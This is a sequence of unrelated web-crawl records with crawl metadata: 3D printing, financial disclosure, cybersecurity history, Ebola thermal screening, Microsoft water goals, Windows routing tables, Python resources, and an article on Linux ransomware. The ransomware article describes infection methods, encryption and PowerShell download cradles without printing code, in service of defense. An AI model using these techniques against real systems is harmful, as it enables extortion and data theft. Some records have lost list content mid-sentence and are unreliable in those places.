it’s even more dangerous than most parasitical keyloggers. Remove Keylogger with reputable security software There is no doubt that keylogging software poses a serious danger to user's safeness. Keylogger removal must be performed as soon as possible. As you already know, these types of programs can steal personal information and use it for further cybercrimes. Keystroke loggers might be hiding in the system and be invisible in the Task Manager. For this reason, you should use reputable anti-virus/anti-malware software to detect and eliminate this cyber threat. Also, make sure you fix the virus damage by running a full system scan with FortectIntego. It will recover your system to its previous state by eliminating changes initiated by the malware. If you have some difficulties and cannot remove Keylogger from the device or fix errors that it caused, you can share your question with us using the Ask Us page. We will be glad to help you solve your problems. Steps to take after keylogger removal Once you get rid of the keylogger, you should also take care of your personal information: - Change all of your passwords (email, social media, bank, etc.); - Set strong and unique passwords for each account; - Enable two-factor authentication to strengthen your accounts; - Monitor your banking transactions and if you notice suspicious transactions, inform your bank directly; - Install and regularly update antivirus software to make sure that any keyloggers are not trying to steal your personal information. Latest keyloggers added to the database Information updated: 2021-01-11
<urn:uuid:cb2eacd1-0e91-45af-9b1f-e127bf4b6786>
CC-MAIN-2024-38
https://www.2-spyware.com/keyloggers-removal
2024-09-14T10:06:08Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651579.22/warc/CC-MAIN-20240914093425-20240914123425-00832.warc.gz
en
0.922674
1,902
2.578125
3
Now that 3D printers are cheaper to produce, experts predict it won’t be long before they are common in our homes. Even today, more companies realise the potential for 3D-printed applications in their own businesses. Since the technology moved from the theoretical to the real, people are expanding the boundaries of what’s possible to print from very practical applications for manufacturing and medical devices to those just for fun. Here are just a few of the amazing real-world examples of 3D printing in 2018. What is 3D printing? 3D printing had its start in the 1980s when Chuck Hull designed and printed a small cup. Also known as additive manufacturing, 3D-printed objects are created from a digital file and a printer that lays down successive layers of material until the object is complete. Each layer is a thinly sliced cross-section of the actual object. It uses less material than traditional manufacturing. Most materials used in 3D printing are thermoplastics—a type of plastic that becomes liquid when heated but will solidify when cool and not be weakened. However, as the technology matures, researchers are finding new materials—even edible—that can be 3D printed. Prosthetic limbs and other body parts From vets who have made a 3D-printed mask to help a dog recover from severe facial injuries to surgical guides, prosthetic limbs and models of body parts, the applications for 3D printing to impact medical strategies is vast. In an experiment conducted by Northwestern University Feinberg School of Medicine in Chicago, a mouse with 3D-printed ovaries gave birth to healthy pups which could bode well for human interventions after more research is done. Homes and other buildings In less than 24 hours, a 400-square-foot house was constructed in a suburb of Moscow with 3D printing technology. The possibilities for quickly erecting houses and other structures with 3D printing are intriguing when time is critical such as to create emergency shelters for areas after a natural disaster. Additionally, the potential for new architectural visions to be realised, that weren’t previously possible with current manufacturing methods will lead to design innovations. An entire two-storey house was 3D printed from concrete in Beijing in just 45 days from start to finish. Researchers from Germany even 3D-printed a house of glass—currently only available in miniature size—but they were the first to figure out how to 3D print with glass. When you think about traditional cake decorating techniques—pushing frosting through a tip to create designs—it’s very similar to the 3D printing application process where material is pushed through a needle and formed one layer at a time. Just as it’s done with 3D plastic printing, a chocolate 3D printer starts with a digital design that is sliced by a computer programme to create layers; then the object will be created layer by layer. Since chocolate hardens quickly at room temperature, it’s an ideal edible material for 3D printing, but companies have printed other edible creations from ice cream, cookie dough, marzipan and even hamburger patties. Defence Distributed was the first to create a 3D-printed firearm in 2013 called the Liberator. While there are 3D printers that can use metal, they are very expensive, so the Liberator was printed using plastic. The advances of 3D technology and the ability to print your own firearm from home has raised questions about how to address the technology in gun control regulations. There are many applications across several industries including automotive, aerospace and more for 3D printing in manufacturing from printing replacement parts of machinery and prototyping new products (with the added benefit of recycling the models after you’re done) to creating moulds and jigs to improve the efficiency of the production process. The bodies of electric vehicles and other cars have been 3D printed. Manufacturers can use 3D printing to lower costs and produce products quicker. From an incredible 3Dvarius, inspired by a Stradivarius violin, to flutes and banjos, several musical instruments and parts of instruments such as mouthpieces have been created using a 3D printer. In fact, the world’s first live concert with a 3D-printed band (drum, keyboard, and two guitars) took place at Lund University in Sweden. Anything your mind can imagine The extraordinary thing about 3D printing is that it can be used to create just about anything your mind can conjure up. It just requires the digital file and the right material. While experts are still troubleshooting how to incorporate 3D printing processes into all areas, weekend warriors are finding all kinds of clever hacks to create with their 3D printers including trash cans, cup holders, electric outlet plates and more.
<urn:uuid:9d4220ba-b08a-4795-9e0a-1a4bf6feb286>
CC-MAIN-2024-38
https://bernardmarr.com/7-amazing-real-world-examples-of-3d-printing/
2024-09-16T21:51:10Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651714.51/warc/CC-MAIN-20240916212424-20240917002424-00632.warc.gz
en
0.95801
981
3.203125
3
One of the most powerful data processing tools used in accounting today is Microsoft Excel. Around since 1985, Excel was designed to … Payment Security 101 Learn about payment fraud and how to prevent it Financial disclosure describes the duty of parties to disclose all information that may be pertinent to a court case. This process starts before the commencement of a court case and does not cease until the case is finalised. Each party must also disclose information as it comes to hand or if new information is created, and disclosure requirements apply to both physical and digital information. Financial disclosure ensures that both parties receive a just and equitable share of total assets. To achieve this, it relies on each providing a detailed account of their financial standing. Financial disclosure is also central to reporting requirements for private and publicly listed companies as well as charities and entities involved in elections and politics. While certain rules stipulate disclosure requirements in all court cases, additional rules are applicable in financial cases. These rules call for full and frank disclosure of each party’s direct and indirect financial circumstances. To that end, financial disclosure statements may include details about: Remember that these resources may be directly or indirectly related to a party. Direct involvement means the party owns the resource or has direct access to the earnings associated with that resource. Indirect involvement, on the other hand, describes resources and earnings that relate to another person or beneficiary. This may be a family member, but it can also be a company, corporation, trust, or associated structure. In family law cases heard in the Federal Circuit and Family Court of Australia (FCFCOA), any property disposal made in the 12 months before a separation of two parties (or since the final separation) must also be disclosed. Here, the word “disposal” encompasses properties that are sold, transferred, assigned, or gifted. Financial disclosure statements must be filed online with the Commonwealth if an individual is party to a financial case related to: Rule 6.06(8) of the FCFCOA’s Family Law Rules requires that in cases involving property, each party must serve the other: Rule 6.06(1) of the Family Law Rules describes the general duty of financial disclosure. To that end, each party must also disclose: In the event a financial disclosure statement does not meet these criteria, an affidavit that provides further details must be filed. If a party’s financial circumstances change, they must file an Amended Statement within 21 days. An affidavit can also be used here if the changed circumstances can be described in 300 words or less. There are other contexts in which financial disclosure is not only important but a legal requirement. Part XX of the Commonwealth Electoral Act (1918) outlines a disclosure scheme that aims to increase transparency around the financial activity of political parties, political candidates, and other relevant stakeholders such as senators and donors. The scheme requires that some parties lodge annual returns, while others lodge returns after elections. Political parties, for example, have to provide public financial disclosures that include (but are not limited to): Since charities receive much of their funding from the government, public financial disclosure reports are made available to increase transparency and accountability around donations. The Australian Charities and Not-for-profits Commission (ACNC) outlines various best practices for charities to detail government contributions in their annual financial reports. Companies listed on the Australian Stock Exchange (ASX) must operate under continuous and periodic financial disclosure rules. Additional disclosure requirements are in place for oil, gas, mining, and exploration companies. What’s more, all companies operating in Australia are required to lodge financial reports with the Australian Securities and Investments Commission (ASIC). Annual financial reports are typically lodged at the end of the financial year and may be audited. Eftsure provides continuous control monitoring to protect your eft payments. Our multi-factor verification approach protects your organisation from financial loss due to cybercrime, fraud and error.
<urn:uuid:35e34da8-0e11-4f0b-b417-26527484a9e9>
CC-MAIN-2024-38
https://eftsure.com/en-nz/blog/finance-glossary/what-is-financial-disclosure/
2024-09-18T04:55:57Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651836.76/warc/CC-MAIN-20240918032902-20240918062902-00532.warc.gz
en
0.942174
812
2.90625
3
We build requirements at a quantum level to connect the vital elements, which are needed to realize a requirement. As we consider the relationships between the behaviors, actions, and responses, we begin to identify and associate the characteristics and conditions, which will drive and constrain the behaviors. Realizing a requirement means joining these elements together and noting them as elements of the requirement. Atoms make up the observable universe. Similarly, everything in our business solutions is, in a sense, made up of requirements, which, like atoms, serve as building blocks for all that "matters" to an organization. What if we could see our requirements as atoms? What would they look like? If we could split one open, what would be inside? Einstein taught us though the special theory of relativity that time and space are two parts of the same whole. We examine requirements in this way. We observe basic elements of a requirement, which upon closer examination, link to each other to the point where they are inseparable. The International Institute of Business Analysis (IIBA®) writes, "Business analysis is the practice of enabling change in an enterprise by defining needs and recommending solutions that deliver value to stakeholders." (International Institute of Business Analysis, 2015, p. 10) This requires a sophisticated means of eliciting and specifying requirements. "A requirement is a usable representation of a need. Requirements focus on understanding what kind of value could be delivered if a requirement is fulfilled. The nature of the representation may be a document (or set of documents), but can vary widely depending on the circumstances." (International Institute of Business Analysis, 2015, p. 48) "[A requirement is] A condition or capability that must be met or possessed by a system, product, service, result, or component to satisfy a contract, standard, specification, or other formally imposed documents. Requirements include the quantified and documented needs, wants, and expectations of the sponsor, customer, and other stakeholders." (Project Management Institute, 2004, p. 371) The IIBA and Project Management Institute (PMI) alike have done a good job at helping us understand the extrinsic value of requirements. Requirements are used to solve problems,satisfy needs, and build solutions. They have extrinsic value because they begin a causal chain of events that eventually brings us to realized value for the organization and its stakeholders. However, neither the IIBA nor PMI explains the intrinsic value of a requirement. The fundamental elements of a requirement give rise to its intrinsic value. Understanding the very nature of those elements is essential to eliciting, planning, analyzing, communicating, and managing them. Because of this basic lack of understanding, we get sporadic arrangements of text, tables, and diagrams, which may or may not reside within a single document. Often conceived with minimal traceability, requirements exist as seeds spread across many packages or across many pages of the same document. What if there was a way solve this problem? It would mean we would have to abandon decades of thinking and begin redefining the very nature of the word "requirement." When we only understand requirements extrinsically, we are doing so in a classical sense. When we add an intrinsic aspect, we are understanding requirements at a quantum level. There are two ways to think of requirements: Classical and Quantum. Requirements, conveyed to stakeholders as textual specifications or graphic images, are classical when they are elicited and recorded as a single declarative statement or image, across a single document or a collection of artifacts packaged together in separate smaller documents. In a classically defined environment, the business analyst would typically ask, "What are your requirements stakeholders?" Appendix-A details examples of classically specified requirements found within a generic Business Requirements Document. Some of these requirements may be poorly stated and disorganized. This is by design and representative of many of the requirements we come across. We also notice that many of these requirements relate to each other in some way. Figure 1 illustrates an example of requirements, that when separated by many pages within the document can cause potential design, development, and testing errors. Again, this is common amongst requirements packages and documents.
<urn:uuid:4c412fb5-052b-497f-bd18-228be49c63f6>
CC-MAIN-2024-38
https://www.globalknowledge.com/ca-en/resources/resource-library/white-paper/stop-gathering-requirements-and-start-building-them/
2024-09-18T04:43:07Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651836.76/warc/CC-MAIN-20240918032902-20240918062902-00532.warc.gz
en
0.932796
842
2.515625
3
Cybersecurity is becoming increasingly significant due to the increased reliance on computer systems, the Internet and wireless network standards such as Bluetooth and Wi-Fi, and due to the growth of smart devices and the various devices that constitute the ‘Internet of things’. Owing to its complexity, both in terms of politics and technology, cybersecurity is also one of the major challenges in the contemporary world. Where did it all begin? We take a look at the history of cybersecurity from inception to the present day. 1970s: ARAPNET and the Creeper Cybersecurity began in the 1970s when researcher Bob Thomas created a computer programme called Creeper that could move across ARPANET’s network, leaving a breadcrumb trail wherever it went. Ray Tomlinson, the inventor of email, wrote the programme Reaper, which chased and deleted Creeper. Reaper was the very first example of antivirus software and the first self-replicating programme, making it the first-ever computer worm. 1980s: Birth of the commercial antivirus 1987 was the birth year of commercial antivirus although there were competing claims for the innovator of the first antivirus product. Andreas Lüning and Kai Figge released their first antivirus product for the Atari ST – which also saw the release of Ultimate Virus Killer in 1987. Three Czechoslovakians created the first version of the NOD antivirus in the same year and in the US, John McAfee founded McAfee and released VirusScan. 1990s: The world goes online With the internet becoming available to the public, more people began putting their personal information online. Organised crime entities saw this as a potential source of revenue and started to steal data from people and governments via the web. By the middle of the 1990s, network security threats had increased exponentially and firewalls and antivirus programmes had to be produced on a mass basis to protect the public. 2000s: Threats diversify and multiply In the early 2000s crime organisations started to heavily fund professional cyberattacks and governments began to clamp down on the criminality of hacking, giving much more serious sentences to those culpable. Information security continued to advance as the internet grew as well but, unfortunately, so did viruses. 2021: The next generation The cybersecurity industry is continuing to grow at the speed of light. The global cybersecurity market size is forecast to grow to $345.4bn by 2026 according to Statista. Ransomware is one of the most common threats to any organisation's data security and is forecast to continue to increase.
<urn:uuid:10fe3dd6-e127-4451-9b73-6b83d9749e3f>
CC-MAIN-2024-38
https://cybermagazine.com/cyber-security/history-cybersecurity
2024-09-19T11:06:06Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652028.28/warc/CC-MAIN-20240919093719-20240919123719-00432.warc.gz
en
0.962971
530
3.03125
3
A Center for Disease Control advisory states “People who have been exposed to Ebola should not travel on commercial airlines until there is a period of monitoring for symptoms of illness lasting 21 days after exposure. “This has presented a conundrum for officials in West Africa, especially airport security workers. How to determine symptoms in passengers who are in their presence for but a few moments? One solution they’ve been employing is to take temperatures, a time-consuming practice. Might using thermal Imaging cameras speed up the process? Since one of the symptoms of Ebola is a temperature of 101.5 or more, temperature-taking has emerged as a daily routine in some countries. You know those signs posted in US bathrooms reminding employees to wash their hands ? They’re nothing compared to Liberia’s Ebola-fighting hygiene requirements. Hygiene and Health Surveillance Nicole Beemsterboer, a NPR producer, just back from ten days in Liberia, reports in her blog , Goats and Soda, that there are buckets of chlorine everywhere, and before granting admittance to any government buildings, officials watch employees and visitors wash their hands. Then they take each person’s temperature with an ear-gun thermometer. The temperature is then written or printed on an ID tag and attached to the person’s clothing where it will be visible to all inside (who are also wearing tags). Anyone with a temperature is sent to a medical facility for further screening. One can only imagine the long queues forming each morning as employees arrive for work. But that’s nothing compared to the lines at airports. As if clearing customs didn’t take enough time, passengers departing from many West African airports also have to have their temperatures taken with an ear-gun. When Beemsterboer ‘s plane landed in Casablanca from Liberia, the passengers underwent a different type of screening. In an effort to both speed up the process , and provide officials with a bit more distance from potentially Ebola-infected passengers, many airports are turning to thermal imaging cameras. Thermal Imaging Cameras as Homeland Security Reuters also reports that several Asian countries are employing thermal imaging screening as a pre-boarding requisite , as well as at major entry points along their borders. SInce everything whether animate, or inanimate, gives off heat in the form of energy waves, thermal imaging sensors have long been used to measure the intensity of the waves. Military applications like night goggles, heat-seeking sensors, and cameras have long been a wartime staple. And now, thermal imaging cameras are perched on a new threshold of possibility. Since the human body is constantly radiating thermal energy the cameras’ sensors are able to collect and convert it into temperature measurement. Thermal imaging cameras and sensors portray temperature on a progressive rainbow palette, with cold at the purple, blue, green end, and hot at the yellow,orange, red end. When detecting temperature in humans, exposed skin of the arms and face will always show up warmer. The warmest area is the area surrounding the tear ducts, the coolest area is the nose, since it is the cooling mechanism for the air we breathe as it enters the body. It is usually seen as blue or green. However should a person be running a fever, there will be a higher proportion of reds in the thermal image and perhaps a few white areas. The image on the left is of a healthy individual, on the right is an individual running a fever. An elevated temperature can be caused by any illness or inflammation, so using thermal cameras is far from a solution to detecting Ebola. But they can be a tool for filtering out people travelling while ill, and will allow security officials to remove the individual from the boarding line and put him/her into isolation until a blood test, which is the only definitive test for Ebola, can be administered. Should you want information about thermal imaging IP cameras for surveillance purposes or any other type of IP camera system, Contact Kintronics at 914-944-3425 to speak to a sales engineer, or just fill out an information request form.
<urn:uuid:ed4f097b-88f4-435b-b132-862b43d04db5>
CC-MAIN-2024-38
https://kintronics.com/r-cameras-take-new-health-role-light-ebola-crisis/
2024-09-19T11:38:48Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652028.28/warc/CC-MAIN-20240919093719-20240919123719-00432.warc.gz
en
0.943225
847
2.875
3
Microsoft plans to become water positive for its direct operations by 2030, replenishing more water than it consumes on a global basis. The company said it will put back more water in stressed basins than its global water consumption across all basins. "Our replenishment strategy will include investments in projects such as wetland restoration and the removal of impervious surfaces like asphalt, which will help replenish water back into the basins that need it most," President Brad Smith said in a blog post. "We will focus our replenishment efforts on roughly 40 highly stressed basins where we have operations. This reflects a science-based assessment of the world’s water basins. "The majority of the world’s freshwater is divided into 16,396 basins, each of which has been assigned a 'baseline water stress' score by the World Resources Institute (WRI), a leading nonprofit global research organization that focuses on natural resources. A basin is considered 'highly stressed' if the amount of water withdrawn exceeds 40 percent of the renewable supply. Globally there are 4,717 basins that fall into this category." Among the water-saving projects underway, its new Silicon Valley campus will include an on-site rainwater collection system and waste treatment plant that will save an estimated 4.3 million gallons of potable water per year. Over in Herzliya, Israel, the campus features plumbing fixtures that drive up water conservation by 35 percent, and water collected from air conditioners will be used to water plants on-site. In India, the newest building on its Hyderabad campus will "support" 100 percent treatment and reuse of wastewater on-site for landscaping, flushing, and cooling tower makeup. Over in Puget Sound, the company's redevelopment of its headquarters to reuse rainwater to save 5.8 million gallons a year. Its Arizona data center region, expected next year, will use zero water for cooling for more than half the year. When temperatures rise above 85°F (29.4°C) and adiabatic cooling is no longer possible, it will use an evaporative cooling system. By 2030, Microsoft also plans to be carbon negative, and remove all the carbon it has ever produced since its founding by 2050. Also in 2030, it hopes to become a zero-waste company, recycling servers and other waste from its direct operations.
<urn:uuid:b79a6718-bd8e-4f1d-ae08-25fc6d39fee6>
CC-MAIN-2024-38
https://www.datacenterdynamics.com/en/news/microsoft-replenish-more-water-it-consumes-2030/
2024-09-19T10:03:45Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652028.28/warc/CC-MAIN-20240919093719-20240919123719-00432.warc.gz
en
0.950285
490
2.8125
3
Ransomware is one of the most prolific and dangerous cybersecurity threats facing computer users worldwide. Modern ransomware operators target a variety of platforms, including Linux. Organizations rely heavily on Linux for critical infrastructure, such as cloud environments and servers, making them attractive targets for ransomware operators and other Advanced Persistent Threat (APT) groups. “Double extortion” is a tactic commonly employed by ransomware operators. In addition to encrypting an organization’s files and demanding a ransom for the decryption key, attackers exfiltrate sensitive data. If the organization fails to pay the ransom, the attackers threaten to release the stolen data publicly or sell it. Such data leaks can be devastating, as the exposure of sensitive information can lead to a catastrophic loss of trust with consumers, who may choose to take their business elsewhere. This article will examine the growing trend of attackers targeting Linux systems and explain how to protect your systems against these threats. The Evolution of Ransomware and Its Impact on Linux Systems Ransomware is malware that encrypts a victim’s data and demands payment for the decryption key. Victims usually receive a dark web link, accessed through The Onion Router (TOR), to ensure the attackers’ anonymity. The link contains instructions on how to make a cryptocurrency payment to meet the ransom demand. Linux was once considered a less likely target for ransomware, but this perception has changed drastically. Linux now powers many of the world’s servers, data centers, and cloud environments, making it increasingly vulnerable malware operators seeking large ransom payouts from organizations. Examples of Ransomware Campaigns Targeting Linux Systems Let’s review a few of the most recent ransomware types targeting Linux systems: DarkRadiation is a ransomware variant that targets Red Hat and Debian-based Linux distributions. Discovered in 2021, DarkRadiation is notable for using Bash scripts to execute malicious commands. It spreads through networks by leveraging Secure Shell (SSH), exploiting systems with weak credentials and unpatched vulnerabilities. DarkRadiation uses obfuscation techniques such as base64 encoding and encryption via OpenSSL to evade detection. Once executed, the malware encrypts the victims’ files using the AES-256-CBC algorithm and appends the “.encrypted” extension to the affected files. The victim then receives a ransom note. RansomEXX is a well-known ransomware variant that has expanded to target Linux systems. Over time, it has played a role in numerous high-profile attacks on government entities, the healthcare sector, and other enterprises. RansomEXX is written in C/C++ and then compiled for Linux. Initial access methods often include phishing or spear-phishing, exploiting vulnerabilities in remote desktop protocols, or using stolen credentials. Once inside the network, the ransomware operators escalate privileges and move laterally, eventually deploying the ransomware payload to encrypt the victim’s filesystem. RansomEXX uses the RSA-4096 and AES-256 algorithms for encryption, which makes decryption impossible without the private key. Advanced threat actors typically deploy RansomEXX in targeted attacks involving extensive reconnaissance and the exfiltration of sensitive data. The attacks commonly employ double extortion tactics. Methods of Infection and Common Attack Vectors Ransomware operators use various methods across different attack vectors to gain initial access to targeted systems: Phishing and social engineering Phishing and spear-phishing are common tactics for gaining initial access to systems. Attackers use social engineering to trick targeted individuals into clicking on malicious links or opening documents containing harmful code, which installs additional malware on the system. Once the ransomware executes, it encrypts the victim’s files and demands a ransom. Figure 2-4. The screenshots below show cleverly crafted phishing pages designed to capture user credentials. Note the URL to see that these are phishing pages, not LinkedIn. Exploiting unpatched or unknown (zero-day) vulnerabilities is another method to breach a system or network. These exploits can range from remote code execution (RCE) vulnerabilities to flaws in the Linux kernel. After gaining access, attackers deploy and execute ransomware to encrypt the filesystem. Weak or compromised credentials Attackers also exploit weak passwords and poor credential management to gain access to systems. Usernames and passwords not changed from default settings are particularly vulnerable. For example, the Cyberav3ngers APT group recently exploited default settings on Programmable Logic Controllers (PLCs) manufactured by Unitronics Vision to access devices used in industrial applications, such as water supply systems worldwide. Supply chain attacks Attackers may compromise a third-party vendor to gain access to target systems. One of the most well-known supply chain attacks was the SolarWinds breach, which compromised multiple U.S. government agencies. By targeting software packages, libraries, and software repositories used in Linux systems, attackers can acquire access to an environment without directly targeting the system itself. Malicious scripts and executables Malicious scripts are often delivered through compromised or malicious websites and email attachments. The scripts, commonly written in Bash, Python, and PowerShell, can download and execute ransomware payloads. A typical example is a script that uses the PowerShell Invoke-Expression (IEX) cmdlet to download malware from a malicious domain. The IEX cmdlet can create a Component Object Model (COM) object or a .NET web object to download and execute malware on a system. The user needs only to open or execute a document or link containing the embedded PowerShell code. Figure 5. This example shows the combination of the Invoke-Expression cmdlet in PowerShell with a .NET web object to download and execute a payload from a malicious domain. Here is the GitHub Gist. Best Practices for Ransomware Prevention and Response Here are several best practices to prevent and mitigate ransomware attacks: Regular backups, data recovery, and business continuity planning (BCP) Implement strict backup procedures and store backups in a secure and isolated environment to ensure a quick recovery from an attack. These measures are often part of a Business Continuity Plan (BCP) designed to enable swift recovery from incidents that disrupt access to data. However, BCPs and backups do not protect against double extortion, where data might still get leaked even after restoring access. Patch management and vulnerability scanning Systems should be continuously updated and patched to address vulnerabilities. Organizations should conduct regular vulnerability scans and promptly remediate any identified vulnerabilities. Automated patch management tools can streamline and enhance the efficiency of this process. Strong authentication and access controls Implementing authentication mechanisms, including multi-factor authentication (MFA), is critical for preventing unauthorized access. Organizations should require unique and complex passwords and regularly audit user privileges to ensure that only authorized individuals can access critical systems and data. Organizations should configure SSH with key pairs for remote access to Linux systems. Network segmentation and firewalls Segmenting networks can limit the spread of malware in the event of an infection. Organizations should use firewalls and intrusion detection/prevention systems (IDS/IPS) to monitor and control communication between network segments. Additionally, organizations can implement privileged access workstations (PWA) to separate systems into categories such as Administrative, Data (servers), and Workstations. PWA ensures that administrative tasks requiring elevated privileges are performed only on isolated machines. Application whitelisting and execution control Application whitelisting (or allowlisting) allows only pre-approved and trusted applications to run on a system. It prevents the execution of unauthorized or malicious software, including ransomware. Organizations can combine application whitelisting with execution control mechanisms like SELinux or AppArmor to enforce security policies and restrict what processes can do. Things to know about application whitelisting and execution control: Security Control: Proactively mitigate the risk of ransomware execution. Implementation: Tools like AppArmor, SELinux, and fs-verity can enforce application whitelisting in Linux environments. Flexibility: Whitelists can be customized according to the needs of administrators and the system. Challenges: Not without its challenges, application whitelisting requires regular maintenance to keep the list updated. Security awareness training Employees should receive regular training on the dangers of phishing and social engineering. Security awareness training helps users recognize and avoid potential threats, reducing the likelihood of successful attacks. Organizations should encourage users to report potential phishing and spam. Additionally, organizations should establish clear procedures for responding to security incidents. Incident response planning Incident response plans should cover people, processes, and technology. The U.S. National Institute for Standards and Technology (NIST) publishes an Incident Response Handbook, a good starting point. Best practices include creating playbooks that detail roles, responsibilities, and steps to take during a breach. Organizations should conduct tabletop exercises and drills to test the incident response plan and prepare team members for real-life incidents. Monitoring and threat intelligence Implement continuous monitoring and proactive threat hunting using a Security Incident and Event Monitoring (SIEM) tool. Security personnel can collect and analyze logs to detect anomalous activity. Set up alerts, analytics rules for known indicators of compromise, and automated responses. Use playbooks for consistent incident handling. Ensure your SIEM system uses threat intelligence to stay ahead of attackers. Continuous monitoring of your Linux systems is essential for detecting malicious activity and ransomware. A SIEM tool is the best way to achieve this, as it allows for real-time log collection and analysis, alert setup, automated responses, and threat hunting using a query language. Your SIEM system should also integrate with threat intelligence sources to stay updated on the latest tactics of threat actors and ransomware operators. Additional Resources and Links Privileged Access Workstations: https://uit.stanford.edu/service/paw NIST Incident Response Guidelines: https://nvlpubs.nist.gov/nistpubs/specialpublications/nist.sp.800-61r2.pdf Malware samples and resources: ITPro Today Linux resources: This article references open-source code repositories and Gists available on GitHub. Please note the following disclaimer by the author: The code provided is helpful for red teaming and security operations. Disclaimer: Any actions you take using this code are entirely your responsibility. This code is intended for use by security professionals involved in professional red-team engagements and security research. The code is free and open source. About the Author You May Also Like
<urn:uuid:4b6144f6-5b43-4c1e-914d-cf15dbc880e9>
CC-MAIN-2024-38
https://www.itprotoday.com/linux-os/linux-ransomware-threats-how-attackers-target-linux-systems
2024-09-20T16:31:15Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701419169.94/warc/CC-MAIN-20240920154713-20240920184713-00332.warc.gz
en
0.897514
2,172
2.828125
3
What is a Routing Table A routing table indicates where will go the packets after leaving the system(PC, Server, Router, Switch. Firewall ..). The routing table in Windows does the same job. Determinate the best path to send the packets when will receive the packets from another source (PC, Server, ....) In a big environment that they have multiple networks, it's a very common practice to add routes for different networks or sometimes for specific IP Addresses. Always the decisions are taken based on the requirements that they have. I will try to give you a very simple example. We have a PC with two different Network Interfaces that are connected to different Networks. Because we can't assign different gateways in each Interface we should leave one interface without a gateway. In this case, we can route the packets from the interface without a gateway in the gateway that we want. So each time that we use the network that we have assigned in the interface without the gateway Windows will know where to send the packets. How to view the routing table Before proceeding with any change in the routing table or troubleshooting network issues you should view the routing table that already exists. As a best practice, it's recommended to keep a note of the routing table before proceeding with any change. You can type the following command to view the routing table. You will see a long list of network destinations and gateways. However, if you don't have added a static route all the entries are created dynamically from the Windows. You can see 3 different categories: - IPv4 Route Table = List all the IPv4 dynamic routes that have been building from the windows. - Persistent Routes = List all the static routes created by the IT Admins. - IPv6 Route table = List all the IPv6 dynamic routes that have been building from the windows. How to add a static route To add a static route on the routing table type the following command. route add destination_network MASK subnet_mask gateway_ip_addres metric Let's explain one by one and give an example - destination_network = From the network subnet that will receive the traffic - subnet_mask= Is the subnet mask of the destination_network - gateway_ip_address = The gateway that will pass the traffic. - metric = It's a value used by routing table to make a routing decision. This value is based on link speed, number of hops, and time delay. It's optional. The static route that will be added manually, exists until the next restart of the PC/Server How to add a persistent route If we want to keep permanent the route then we need to add the option -p as in the example. route add -p destination_network MASK subnet_mask gateway_ip_addres metric This option will keep the route in the Persistent Routes of the routing table and will not deleted after a restart. Let's go to do an example with a very simple scenario The scenario is the following: We have one Laptop with a connection to a Local Network with a wired cable and a connection to Wi-fi. We want to pass the traffic from the Local connection to our Local Network (Domain Controller, Fileserver ...). However, we would like to connect to the Internet only from the Wi-fi connection. The networks are - 172.16.3.0/24 for the local network - 192.168.137.0 for the Wi-fi connection We will type the following command to route the traffic from the Local connection (wired cable) to the Local Network. route add -p 18.104.22.168 MASK 255.0.0.0 172.16.3.254 Let's explain the above command. Because we have multiple VLANs in our network we say that any traffic that comes from the subnet 22.214.171.124 (which includes all the subnets that start with 172) routes to the gateway 172.16.3.254 which is the gateway of the Local connection. Now let's create the routing for the Wi-fi. route add -p 0.0.0.0 MASK 0.0.0.0 192.168.137.254 Let's explain the above command. The following command routes all the traffic that isn't matched to the subnets 126.96.36.199 with mask 255.0.0.0 to the gateway of the Wi-fi adapter. Let's take a look at the routing table to verify the routes Type route print and check the Persistent Routes. We should see the new routes After we have created and verified the routes in the routing table, we should verify that all work as expected. Type the following command, and monitor the real-time connections of your machine. Then open a Web page and check from where to send the requests. Also, open a Remote desktop connection to an internal Server, and check from where the requests are sent. If all are working as expected, the requests to the web page should be sent from 192.168.137.x, and the requests to the Remote desktop connections should be sent from 172.16.3.x How to delete a static or persistent route If we have created routes we would like to delete, we can replace the route add with the route delete. Let's see the example with the command. route delete 0.0.0.0 MASK 0.0.0.0 192.168.137.254 The command for the route it's very simple. However, you should have understood the traffic flow and what you want to achieve. I hope to be valuable in this article. See you next week.
<urn:uuid:ae55ca6f-596e-4772-b641-0a4296fe88cd>
CC-MAIN-2024-38
https://askme4tech.com/how-add-static-or-persistent-route-windows
2024-09-08T12:26:14Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651002.87/warc/CC-MAIN-20240908115103-20240908145103-00532.warc.gz
en
0.926804
1,216
4.03125
4
Coding in Python is not hard, in fact – it has been acclaimed as the easiest programming language to learn for a long time. It is a good starting point if you’re looking to get into web development, even game development – as there are so many resources for building games with Python. It’s one of the ways of learning the language quickly. Many programmers have used Python as the beginning of their journey, to later pick up languages like PHP and Ruby. It’s also one of the hottest web programming languages in 2014, and highly recommended to learn. But, how to learn Python? Where to go to begin learning? I’m here to solve that problem for you, as I’ve myself relied on many of these resources to learn programming, and begin development. Just a friendly tip and word of advice, the best way to learn is by doing – and these books, resources are here only to guide you in the right direction. The absolute easiest way of learning Python is by completing this book. You’ll be amazed at how easy it is to pickup the basics, and you get that sense of real learning process, acquiring new knowledge as you move forward. I also learned that it is very encouraging to try and create your own programs. Those programs might be small, but they’ll definitely help you better understand the language and how the syntax works. It’s highly popular, and so if you ever get stuck, it’s more than likely that there are several answers available on sites like StackExchange, just do a Google search when you need a solution or help. You’ll learn how to: Setup Python Programming Environment on All Platforms Write Python Programs Understand Python Syntax and Documentation Think Like a Programmer a lot more! The HTML online version is completely free, and it’s also what most people use – I do encourage you to donate / purchase the full book, as the author has put a lot of effort into making it happen, and the premium version also includes videos – if you find learning from videos a lot easier. It might be a little tricky to get this one going, if you’ve never in your life programmed before, but it goes together well with the above book, and you should definitely give it a go. There are 33 levels (puzzles), which can be solved by using your Python programming skills. Millions of people have attempted to solve this, and even if you’re unable to complete all of the levels, you’ll have learned quite a few new things – especially in the field of critical and sharp thinking. Your brain is going to overheat, but that’s programming! You’ll find that many ‘elite’ programmers will tell this interactive platform off, but that’s not the point. What we want is to see / test how the basic syntax of a programming language works, and what can be done when its combined with functions, other than the usual ‘Hello World!’ we’re printing. In this Codecademy course you will learn how to work with files, how to use loops and how they work, what are functions and what they’re good for. 